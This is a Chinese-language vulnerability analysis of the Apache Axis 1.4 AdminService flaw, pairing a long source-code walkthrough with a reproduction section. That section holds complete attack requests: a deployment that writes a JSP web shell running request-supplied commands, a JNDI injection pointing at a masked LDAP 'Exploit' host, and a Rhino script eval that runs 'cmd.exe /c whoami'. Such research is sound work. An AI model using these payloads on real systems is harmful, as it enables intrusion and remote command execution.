Java安全之Axis漏洞分析

Java安全之Axis漏洞分析

0x00 前言

看到個別代碼常出現裏面有一些Axis組件,沒去仔細研究過該漏洞。研究記錄一下。

0x01 漏洞復現

漏洞版本:axis=<1.4

Axis1.4

freemarker

下載Axis包1.4版本將Axis放到tomcat的webapp目錄中。freemarker.jar放到Axis的 lib目錄下。運行tomcat即可。

WEB-INF/web.xml 中將該配置取消註釋

  <servlet-mapping>
    <servlet-name>AdminServlet</servlet-name>
    <url-pattern>/servlet/AdminServlet</url-pattern>
  </servlet-mapping>

原創復現需要將/WEB-INF下面的server-config.wsdd文件中的內容進行編輯一下

<service name="AdminService" provider="java:MSG">
  <parameter name="allowedMethods" value="AdminService"/>
  <parameter name="enableRemoteAdmin" value="true"/>
  <parameter name="className" value="org.apache.axis.utils.Admin"/>
  <namespace>http://xml.apache.org/axis/wsdd/</namespace>
 </service>

enableRemoteAdmin的值改成true運行遠程調用。

server-config.wsdd文件會在遠程機器訪問/servlet/AdminServlet路由時候進行創建。

接下來對該接口進行發送payload測試

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns1:deployment
  xmlns="http://xml.apache.org/axis/wsdd/"
  xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
  xmlns:ns1="http://xml.apache.org/axis/wsdd/">
  <ns1:service name="RandomService" provider="java:RPC">
    <requestFlow>
      <handler type="RandomLog"/>
    </requestFlow>
    <ns1:parameter name="className" value="java.util.Random"/>
    <ns1:parameter name="allowedMethods" value="*"/>
  </ns1:service>
  <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" > 
    <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" />  
    <parameter name="LogHandler.writeToConsole" value="false" />
  </handler>
</ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>

爆了一個ns1:Client.NoSOAPAction錯誤。

看了一下AdminServlet的代碼,發現dopost方法裏面調用的getSoapAction這個判斷邏輯貌似有點問題

上面req.getHeader("SOAPAction");獲取header裏面SOAPAction的值,如果爲空則取Content-Type裏面的action。都爲空則直接返回,來到下面這段邏輯。

    if (soapAction == null) {
      AxisFault af = new AxisFault("Client.NoSOAPAction", Messages.getMessage("noHeader00", "SOAPAction"), null, null);
      exceptionLog.error(Messages.getMessage("genFault00"), (Throwable)af);
      throw af;
    } 

這裏只需要header加入SOAPAction參數,填充任意值,讓服務端獲取到不爲空,能解決了這個問題。

使用上面payload,創建好惡意的service後,下面來調用一下惡意的service。

/axis/services/RandomService

payload:

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>

文件寫入成功

重新打開server-config.wsdd文件發現內容已經發生了變化

payload整理

org.apache.axis.handlers.LogHandler

POST請求:

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 777

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" >
  <soap:Body>
    <deployment
      xmlns="http://xml.apache.org/axis/wsdd/"
      xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
        <service name="randomAAA" provider="java:RPC">
<requestFlow>
            <handler type="java:org.apache.axis.handlers.LogHandler" >
                <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" />
                <parameter name="LogHandler.writeToConsole" value="false" />
            </handler>
        </requestFlow>
          <parameter name="className" value="java.util.Random" />
          <parameter name="allowedMethods" value="*" />
        </service>
    </deployment>
  </soap:Body>
</soap:Envelope>

GET請求:

GET /axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2FROOT%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache

調用service:

POST /axis/services/randomBBB HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 700

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">
   <soapenv:Header/>
   <soapenv:Body>
      <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[
<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); %>
]]></in0>
         <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>
      </util:ints>
   </soapenv:Body>
</soapenv:Envelope>

該方式寫文件需要解析,遇到Springboot就涼涼。

org.apache.axis.client.ServiceFactory

POST請求:

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 750

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soapenv:Body>
    <ns1:deployment xmlns:ns1="http://xml.apache.org/axis/wsdd/" xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
      <ns1:service name="ServiceFactoryService" provider="java:RPC">
        <ns1:parameter name="className" value="org.apache.axis.client.ServiceFactory"/>
        <ns1:parameter name="allowedMethods" value="*"/>
      </ns1:service>
    </ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>

GET請求:

GET /axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22ServiceFactoryService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22org.apache.axis.client.ServiceFactory%22%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%2F%3E%3C%2Fservice%3E%3C%2Fdeployment HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache

調用service:

POST /axis/services/ServiceFactoryService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 891

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://client.axis.apache.org">
   <soapenv:Header/>
   <soapenv:Body>
      <cli:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <environment xsi:type="x-:Map" xs:type="type:Map" xmlns:x-="http://xml.apache.org/xml-soap" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">
            <!--Zero or more repetitions:-->
            <item xsi:type="x-:mapItem" xs:type="type:mapItem">
               <key xsi:type="xsd:anyType">jndiName</key>
               <value xsi:type="xsd:anyType">ldap://xxx.xx.xx.xxx:8888/Exploit</value>
            </item>
         </environment>
      </cli:getService>
   </soapenv:Body>
</soapenv:Envelope>

這個點需要利用JNDI注入

com.sun.script.javascript.RhinoScriptEngine

POST請求:

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 905

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" >
  <soap:Body>
    <deployment
      xmlns="http://xml.apache.org/axis/wsdd/"
      xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
        <service name="RhinoScriptEngineService" provider="java:RPC">
          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
          <parameter name="allowedMethods" value="eval" />
<typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
                     type="java:javax.script.SimpleScriptContext"
                     qname="ns:SimpleScriptContext"
                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
                     xmlns:ns="urn:beanservice" regenerateElement="false">
        </typeMapping>
        </service>
    </deployment>
  </soap:Body>
</soap:Envelope>

GET請求:

GET /axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache

調用service:

POST /axis/services/RhinoScriptEngineService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 866

<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com"><soapenv:Body><eval xmlns="http://127.0.0.1:8080/services/scriptEngine"><arg0 xmlns="">
<![CDATA[function test(){    var cmd1 = 'c';    cmd1 += 'm';    cmd1 += 'd';    cmd1 += '.';    cmd1 += 'e';    cmd1 += 'x';    cmd1 += 'e';    var cmd2 = '/';    cmd2 += 'c';    var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'whoami');    var process = pb.start();    var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();    return ret;}   test();]]></arg0><arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
</arg1></eval></soapenv:Body></soapenv:Envelope>

該方式有JDK版本要求 JDK版本必須要爲7或7以下版本。JDK7版本後ScriptEngine被廢除了,使用了NashornScriptEngine進行代替,NashornScriptEngine類不能直接被利用

解析流程分析

Init

  <servlet>
    <servlet-name>AxisServlet</servlet-name>
    <display-name>Apache-Axis Servlet</display-name>
    <servlet-class>
        org.apache.axis.transport.http.AxisServlet
    </servlet-class>
  </servlet>
... 
<servlet-mapping>
    <servlet-name>AxisServlet</servlet-name>
    <url-pattern>/services/*</url-pattern>
  </servlet-mapping>

看到org.apache.axis.transport.http.AxisServlet

public void init() throws ServletException {
        super.init();
        ServletContext context = this.getServletConfig().getServletContext();
        isDebug = log.isDebugEnabled();
        if (isDebug) {
            log.debug("In servlet init");
        }

        this.transportName = this.getOption(context, "transport.name", "http");
        if (JavaUtils.isTrueExplicitly(this.getOption(context, "use-servlet-security", (String)null))) {
            this.securityProvider = new ServletSecurityProvider();
        }

        this.enableList = JavaUtils.isTrueExplicitly(this.getOption(context, "axis.enableListQuery", (String)null));
        this.jwsClassDir = this.getOption(context, "axis.jws.servletClassDir", (String)null);
        this.disableServicesList = JavaUtils.isTrue(this.getOption(context, "axis.disableServiceList", "false"));
        this.servicesPath = this.getOption(context, "axis.servicesPath", "/services/");
        if (this.jwsClassDir != null) {
            if (this.getHomeDir() != null) {
                this.jwsClassDir = this.getHomeDir() + this.jwsClassDir;
            }
        } else {
            this.jwsClassDir = this.getDefaultJWSClassDir();
        }
 //初始化查詢Handler,即wsdl對應的handler,用於wsdl文件生成    
        this.initQueryStringHandlers();

        try {
            ServiceAdmin.setEngine(this.getEngine(), context.getServerInfo());
        } catch (AxisFault var3) {
            exceptionLog.info("Exception setting AxisEngine on ServiceAdmin " + var3);
        }

    }

把所有以jws結尾或者services路徑的的URL均由AxisServlet進行處理

super.init();

org.apache.axis.transport.http.init

  public void init() throws ServletException {
        ServletContext context = this.getServletConfig().getServletContext();
        this.webInfPath = context.getRealPath("/WEB-INF");
        this.homeDir = context.getRealPath("/");
        isDebug = log.isDebugEnabled();
        if (log.isDebugEnabled()) {
            log.debug("In AxisServletBase init");
        }

        this.isDevelopment = JavaUtils.isTrueExplicitly(this.getOption(context, "axis.development.system", (String)null));
    }

org.apache.axis.transport.http.getOption

 protected String getOption(ServletContext context, String param, String dephault) {
        String value = AxisProperties.getProperty(param);
        if (value == null) {
            value = this.getInitParameter(param);
        }

        if (value == null) {
            value = context.getInitParameter(param);
        }

        try {
            AxisServer engine = getEngine(this);
            if (value == null && engine != null) {
                value = (String)engine.getOption(param);
            }
        } catch (AxisFault var6) {
        }

        return value != null ? value : dephault;
    }

org.apache.axis.transport.http.getEngine

public static AxisServer getEngine(HttpServlet servlet) throws AxisFault {
        AxisServer engine = null;
        if (isDebug) {
            log.debug("Enter: getEngine()");
        }

        ServletContext context = servlet.getServletContext();
        synchronized(context) {
            engine = retrieveEngine(servlet);
            if (engine == null) {
                Map environment = getEngineEnvironment(servlet);
                engine = AxisServer.getServer(environment);
                engine.setName(servlet.getServletName());
                storeEngine(servlet, engine);
            }
        }

        if (isDebug) {
            log.debug("Exit: getEngine()");
        }

        return engine;
    }

org.apache.axis.transport.http.getEngineEnvironment

從當前上下文中獲取AxisServer Engine,如果返回爲null,則進行初始化並存儲至上下文中

 protected static Map getEngineEnvironment(HttpServlet servlet) {
        Map environment = new HashMap();
        String attdir = servlet.getInitParameter("axis.attachments.Directory");
        if (attdir != null) {
            environment.put("axis.attachments.Directory", attdir);
        }

        ServletContext context = servlet.getServletContext();
        environment.put("servletContext", context);
        String webInfPath = context.getRealPath("/WEB-INF");
        if (webInfPath != null) {
            environment.put("servlet.realpath", webInfPath + File.separator + "attachments");
        }

        EngineConfiguration config = EngineConfigurationFactoryFinder.newFactory(servlet).getServerEngineConfig();
        if (config != null) {
            environment.put("engineConfig", config);
        }

        return environment;
    }

這裏返回的是一個org.apache.axis.configuration.EngineConfigurationFactoryServlet工廠實例

調用getServerEngineConfig來到org.apache.axis.configuration.getServerEngineConfig,

EngineConfigurationFactoryFinder.newFactory(servlet)返回org.apache.axis.configuration.EngineConfigurationFactoryServlet工廠實例,並通過private static EngineConfiguration getServerEngineConfig(ServletConfig cfg)新建EngineConfiguration實現類:FileProvider對象(即server-config.wsdd的文件操作類)

代碼流程回到getEngineEnvironment

protected static Map getEngineEnvironment(HttpServlet servlet) {
    Map environment = new HashMap();
    String attdir = servlet.getInitParameter("axis.attachments.Directory");
    if (attdir != null) {
        environment.put("axis.attachments.Directory", attdir);
    }

    ServletContext context = servlet.getServletContext();
    environment.put("servletContext", context);
    String webInfPath = context.getRealPath("/WEB-INF");
    if (webInfPath != null) {
        environment.put("servlet.realpath", webInfPath + File.separator + "attachments");
    }

    EngineConfiguration config = EngineConfigurationFactoryFinder.newFactory(servlet).getServerEngineConfig();
    if (config != null) {
        environment.put("engineConfig", config);
    }

    return environment;
}

environment.put("engineConfig", config);

把剛剛讀取server-config.wsdd的對象,存儲到map中進行返回。

邏輯走到org.apache.axis.transport.http.getEngine

public static AxisServer getEngine(HttpServlet servlet) throws AxisFault {
    AxisServer engine = null;
    if (isDebug) {
        log.debug("Enter: getEngine()");
    }

    ServletContext context = servlet.getServletContext();
    synchronized(context) {
        engine = retrieveEngine(servlet);
        if (engine == null) {
            Map environment = getEngineEnvironment(servlet);
            engine = AxisServer.getServer(environment);
            engine.setName(servlet.getServletName());
            storeEngine(servlet, engine);
        }
    }

org.apache.axis.server.AxisServer

public static AxisServer AxisServer(Map environment) throws AxisFault {
        if (factory == null) {
            String factoryClassName = AxisProperties.getProperty("axis.ServerFactory");
            if (factoryClassName != null) {
                try {
                    Class factoryClass = ClassUtils.forName(factoryClassName);
                    if ((class$org$apache$axis$server$AxisServerFactory == null ? (class$org$apache$axis$server$AxisServerFactory = class$("org.apache.axis.server.AxisServerFactory")) : class$org$apache$axis$server$AxisServerFactory).isAssignableFrom(factoryClass)) {
                        factory = (AxisServerFactory)factoryClass.newInstance();
                    }
                } catch (Exception var3) {
                    log.error(Messages.getMessage("exception00"), var3);
                }
            }

            if (factory == null) {
                factory = new DefaultAxisServerFactory();
            }
        }

        return factory.getServer(environment);
    }

加載到重載getServer方法

public AxisServer getServer(Map environment) throws AxisFault {
        log.debug("Enter: DefaultAxisServerFactory::getServer");
        AxisServer ret = createServer(environment);
        if (ret != null) {
            if (environment != null) {
                ret.setOptionDefault("attachments.Directory", (String)environment.get("axis.attachments.Directory"));
                ret.setOptionDefault("attachments.Directory", (String)environment.get("servlet.realpath"));
            }

            String attachmentsdir = (String)ret.getOption("attachments.Directory");
            if (attachmentsdir != null) {
                File attdirFile = new File(attachmentsdir);
                if (!attdirFile.isDirectory()) {
                    attdirFile.mkdirs();
                }
            }
        }

        log.debug("Exit: DefaultAxisServerFactory::getServer");
        return ret;
    }
  private static AxisServer createServer(Map environment) {
        EngineConfiguration config = getEngineConfiguration(environment);
        return config == null ? new AxisServer() : new AxisServer(config);
    }
 public AxisServer(EngineConfiguration config) {
        super(config);
        this.running = true;
        this.setShouldSaveConfig(true);
    }

org.apache.axis.AxisEngine

public AxisEngine(EngineConfiguration config) {
    this.config = config;
    this.init();
}

org.apache.axis.AxisEngine

public void init() {
    if (log.isDebugEnabled()) {
        log.debug("Enter: AxisEngine::init");
    }

    try {
        this.config.configureEngine(this);
    } catch (Exception var2) {
        throw new InternalException(var2);
    }

org.apache.axis.configuration.FileProvider

public void configureEngine(AxisEngine engine) throws ConfigurationException {
        try {
            if (this.getInputStream() == null) {
                try {
                    this.setInputStream(new FileInputStream(this.configFile));
                } catch (Exception var3) {
                    if (this.searchClasspath) {
                        this.setInputStream(ClassUtils.getResourceAsStream(engine.getClass(), this.filename, true));
                    }
                }
            }

            if (this.getInputStream() == null) {
                throw new ConfigurationException(Messages.getMessage("noConfigFile"));
            } else {
                WSDDDocument doc = new WSDDDocument(XMLUtils.newDocument(this.getInputStream()));
                //部署或者取消部署,這個得看文檔配置
                this.deployment = doc.getDeployment();
                //定義所有數據配置此AxisEngine
                this.deployment.configureEngine(engine);
                //刷新內容
                engine.refreshGlobalOptions();
                this.setInputStream((InputStream)null);
            }
        } catch (Exception var4) {
            throw new ConfigurationException(var4);
        }
    }

以上這整體解析流程爲configureEngine解析server-config.wsdd服務配置。將配置文件中的各種屬性handlerglobalConfigurationservicetransport緩存至WSDDDeployment類中。刷新global配置選項即將server-config.wsdd配置文件中globalConfiguration節點中的parameter屬性集合由AxisEngine持有。

以上就已經完成了init的

doGet

看到doGet

public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    if (isDebug) {
        log.debug("Enter: doGet()");
    }

    FilterPrintWriter writer = new FilterPrintWriter(response);

    try {
        AxisEngine engine = this.getEngine();
        ServletContext servletContext = this.getServletConfig().getServletContext();
        String pathInfo = request.getPathInfo();
        String realpath = servletContext.getRealPath(request.getServletPath());
        if (realpath == null) {
            realpath = request.getServletPath();
        }

        boolean isJWSPage = request.getRequestURI().endsWith(".jws");
        if (isJWSPage) {
            pathInfo = request.getServletPath();
        }

        if (this.processQuery(request, response, writer)) {
            return;
        }

獲取請求URI中爲jws結尾的則調用request.getServletPath();

例如/axis/EchoHeaders.jws?wsdl使用pathInfo則等於EchoHeaders.jws

然後下面由processQuery方法來進行解析

上面是一系列的獲取請求路徑,來直接看到下面代碼,下面代碼進行了遍歷

到這裏把server-config.wsdd的配置內容都給加載了進來,下面根據查詢條件字符串(即wsdl),通過與server-config.wsddtransport節點parameter屬性匹配,查找對應的handler。

繼續來看解析流程

看到獲取handler的步驟。因爲這裏是wsdl的方式去請求,所以這裏獲取到的是QSWSDLHandler類,下面會進行反射去調用invoke方法

public void invoke(MessageContext msgContext) throws AxisFault {
    this.configureFromContext(msgContext);
    AxisServer engine = (AxisServer)msgContext.getProperty("transport.http.plugin.engine");
    PrintWriter writer = (PrintWriter)msgContext.getProperty("transport.http.plugin.writer");
    HttpServletResponse response = (HttpServletResponse)msgContext.getProperty(HTTPConstants.MC_HTTP_SERVLETRESPONSE);

    try {
        engine.generateWSDL(msgContext);
        Document wsdlDoc = (Document)msgContext.getProperty("WSDL");
        if (wsdlDoc != null) {
            try {
                this.updateSoapAddressLocationURLs(wsdlDoc, msgContext);
            } catch (RuntimeException var7) {
                this.log.warn("Failed to update soap:address location URL(s) in WSDL.", var7);
            }

            response.setContentType("text/xml; charset=" + XMLUtils.getEncoding().toLowerCase());
            this.reportWSDL(wsdlDoc, writer);
        } else {
            if (this.log.isDebugEnabled()) {
                this.log.debug("processWsdlRequest: failed to create WSDL");
            }

            this.reportNoWSDL(response, writer, "noWSDL02", (AxisFault)null);
        }
    } catch (AxisFault var8) {
        if (!var8.getFaultCode().equals(Constants.QNAME_NO_SERVICE_FAULT_CODE)) {
            throw var8;
        }

        this.processAxisFault(var8);
        response.setStatus(404);
        this.reportNoWSDL(response, writer, "noWSDL01", var8);
    }

}

這裏這一大串代碼則是創建對應得WSDL並且進行返回的步驟。

將生成wsdl任務交給server-config.wsdd所配置的一系列Handler,其執行順序爲
transport【requestFlow】---->globalConfiguration【requestFlow】---->service【requestFlow】---->service【responseFlow】---->globalConfiguration【responseFlow】---->transport【responseFlow】
針對jws的服務通過JWSHandler處理。

再來看到jws的服務處理的Handler

org.apache.axis.handlers.JWSHandler

  public void invoke(MessageContext msgContext) throws AxisFault {
        if (log.isDebugEnabled()) {
            log.debug("Enter: JWSHandler::invoke");
        }

        try {
            this.setupService(msgContext);
        } catch (Exception var3) {
            log.error(Messages.getMessage("exception00"), var3);
            throw AxisFault.makeFault(var3);
        }
    }

以上代碼主要完成將jws轉換成java文件,並臨時存放至jwsClasses目錄中,再通過jdk中的編譯器sun.tools.javac.Maincom.sun.tools.javac.main.Main對java文件進行編譯,將編譯後的class文件存放至jwsClasses目錄中,刪除臨時java文件,並將生成的class二進制文件加載至類加載器中。
rpc = new SOAPService(new RPCProvider());
增加Handler實例RPCProvider(繼承BasicProvider)到當前handler鏈中

DoPost

來到dopost裏面來看邏輯

前面獲取一些請求路徑和context、Engine等內容,在這裏就不看了

org.apache.axis.server.AxisServer#invoke

if (hName != null && (h = this.getTransport(hName)) != null && h instanceof SimpleTargetedChain) {
                        transportChain = (SimpleTargetedChain)h;
                        h = transportChain.getRequestHandler();
                        if (h != null) {
                            h.invoke(msgContext);
                        }
                    }

hName這個值爲http,this.getTransport(hName)server-config.wsdd獲取值

h.invoke(msgContext);

//循環訪問調用每個處理程序的鏈
public void invoke(MessageContext msgContext) throws AxisFault {
    if (log.isDebugEnabled()) {
        log.debug("Enter: SimpleChain::invoke");
    }

    this.invoked = true;
    this.doVisiting(msgContext, iVisitor);
    if (log.isDebugEnabled()) {
        log.debug("Exit: SimpleChain::invoke");
    }

}

this.doVisiting(msgContext, iVisitor);

org.apache.axis.SimpleChain#doVisiting

 private void doVisiting(MessageContext msgContext, HandlerIterationStrategy visitor) throws AxisFault {
        int i = 0;

        try {
            for(Enumeration enumeration = this.handlers.elements(); enumeration.hasMoreElements(); ++i) {
                Handler h = (Handler)enumeration.nextElement();
                visitor.visit(h, msgContext);
            }

        } catch (AxisFault var6) {
            if (!msgContext.isPropertyTrue(this.CAUGHTFAULT_PROPERTY)) {
                Message respMsg = new Message(var6);
                msgContext.setResponseMessage(respMsg);
                msgContext.setProperty(this.CAUGHTFAULT_PROPERTY, Boolean.TRUE);
            }

visitor.visit(h, msgContext);

遍歷XML內容,調用method.invoke

到這裏則完成service的調用。

至於這裏爲什麼是MsgProvider是因爲在server-config.wsdd中的配置

0x02 漏洞分析

漏洞分析

org.apache.axis.utils.Admin#AdminService

public Element[] AdminService(Element[] xml) throws Exception {
    log.debug("Enter: Admin::AdminService");
    MessageContext msgContext = MessageContext.getCurrentContext();
    Document doc = this.process(msgContext, xml[0]);
    Element[] result = new Element[]{doc.getDocumentElement()};
    log.debug("Exit: Admin::AdminService");
    return result;
}

this.process(msgContext, xml[0]);來看這個地方

public Document process(MessageContext msgContext, Element root) throws Exception {
    this.verifyHostAllowed(msgContext);
    String rootNS = root.getNamespaceURI();
    AxisEngine engine = msgContext.getAxisEngine();
    if (rootNS != null && rootNS.equals("http://xml.apache.org/axis/wsdd/")) {
        return processWSDD(msgContext, engine, root);
    } else {
        throw new Exception(Messages.getMessage("adminServiceNoWSDD"));
    }
}

this.verifyHostAllowed(msgContext);

private void verifyHostAllowed(MessageContext msgContext) throws AxisFault {
    Handler serviceHandler = msgContext.getService();
    if (serviceHandler != null && !JavaUtils.isTrueExplicitly(serviceHandler.getOption("enableRemoteAdmin"))) {
        String remoteIP = msgContext.getStrProp("remoteaddr");
        if (remoteIP != null && !remoteIP.equals("127.0.0.1") && !remoteIP.equals("0:0:0:0:0:0:0:1")) {
            try {
                InetAddress myAddr = InetAddress.getLocalHost();
                InetAddress remoteAddr = InetAddress.getByName(remoteIP);
                if (log.isDebugEnabled()) {
                    log.debug("Comparing remote caller " + remoteAddr + " to " + myAddr);
                }

                if (!myAddr.equals(remoteAddr)) {
                    log.error(Messages.getMessage("noAdminAccess01", remoteAddr.toString()));
                    throw new AxisFault("Server.Unauthorized", Messages.getMessage("noAdminAccess00"), (String)null, (Element[])null);
                }
            } catch (UnknownHostException var6) {
                throw new AxisFault("Server.UnknownHost", Messages.getMessage("unknownHost00"), (String)null, (Element[])null);
            }
        }
    }

}

上面這個地方獲取了enableRemoteAdmin的值進行判斷這個enableRemoteAdmin是否爲True,如果不爲Ture,則判斷遠程請求的地址是否爲本機訪問。如果都不是則直接拋出異常。

繼續看到processWSDD(msgContext, engine, root);位置

engine.saveConfiguration();

 public void saveConfiguration() {
        if (this.shouldSaveConfig) {
            try {
                this.config.writeEngineConfig(this);
            } catch (Exception var2) {
                log.error(Messages.getMessage("saveConfigFail00"), var2);
            }

        }
    }

org.apache.axis.configuration.FileProvider#writeEngineConfig

這個地方會將請求過來的xml數據寫入到server-config.wsdd文件裏面

而根據前面的分析得知,調用和配置service等操作都是由這個文件來進行獲取的配置信息。那麼接下來的東西就一目瞭然了。

漏洞利用

前面復現漏洞中發現payload打完後server-config.wsdd多了一串配置,往下看

<handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler">
  <parameter name="LogHandler.writeToConsole" value="false"/>
